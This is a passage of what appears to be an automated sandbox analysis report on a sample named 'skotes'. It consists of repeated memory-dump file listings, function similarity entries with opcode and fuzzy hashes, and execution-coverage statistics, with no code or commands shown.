                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                                                                                • Opcode ID: fe184e1e0fa161fd8bf378bd8a90adcdee3697bbe3dc6b46507b8599baacbe8d
                                                                                                                                                                                                                                • Instruction ID: 04beb1361d97f4a1eea4cd507f6664afb484d088f6411734ee1176e452d2434b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe184e1e0fa161fd8bf378bd8a90adcdee3697bbe3dc6b46507b8599baacbe8d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36A1E1B0A01219DFDB21DF64C949BAAB7E9FF15310F04822AE915D7381EB35EA04CBD1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                • String ID: vr
                                                                                                                                                                                                                                • API String ID: 3213747228-593451772
                                                                                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                • Instruction ID: ec6946a4f279d32ab9b1418d1339c85dbdbce4d81a052413d243b3f3224677d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AB16A32E002A59FDB16CF28D8817BEBBE5EF65350F15416AE845EB242D63C9E41CB60
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                • Opcode ID: b7a6bfb85b665cc8448c73e8d5cdb19c38b1730bd25bf7fe07767e87c2412220
                                                                                                                                                                                                                                • Instruction ID: b44687d64c86284783a1a60ac568a7424e962ac33f232c447e540e2664b52822
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7a6bfb85b665cc8448c73e8d5cdb19c38b1730bd25bf7fe07767e87c2412220
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4215176A00109EFDF01EFA4CC859BEB7B9EF08710F104215FA01B7291DB79AD019BA1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                • String ID: 8"u$`'u
                                                                                                                                                                                                                                • API String ID: 3903695350-3768269654
                                                                                                                                                                                                                                • Opcode ID: a728fbcee930a6093c5a1e3f1a5ef264f70c58a9b719d07db11431c58a576402
                                                                                                                                                                                                                                • Instruction ID: dff95fd5037bdfc617dd0bc00d83298702648b639292c33927ca7c4e87ce8d8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a728fbcee930a6093c5a1e3f1a5ef264f70c58a9b719d07db11431c58a576402
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6312A31600662EFEB31AA39E849B5B77F8EF00352F14443AE455D759ADEB9EC808B11

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:9.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:1.7%
                                                                                                                                                                                                                                Total number of Nodes:1953
                                                                                                                                                                                                                                Total number of Limit Nodes:38
